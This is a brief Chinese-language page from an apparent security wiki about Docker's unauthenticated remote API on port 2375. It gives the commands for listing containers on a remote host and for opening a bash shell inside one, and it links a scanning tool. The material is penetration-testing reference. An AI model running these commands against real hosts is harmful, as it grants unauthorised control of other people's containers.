> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/yun-an-quan/docker/wei-shou-quan-api.md).

# 未授权API

```
    当系统上安装 docker 时，它将在位于端口 2375 的本地主机上公开一个 API。该 API 可用于与 docker 引擎进行交互，这基本上使您有权在未经身份验证的情况下执行任何您想做的事情。向 /version 端点发出 GET 请求。 将打印出一个 json blob
    在 CLI 中，执行以下命令来获取当前正在运行的容器列表：
    $ docker -H host:port ps
    弹出一个 shell
    $ docker -H host:port exec -it container name /bin/bash
    https://github.com/Ullaakut/Gorsair
```
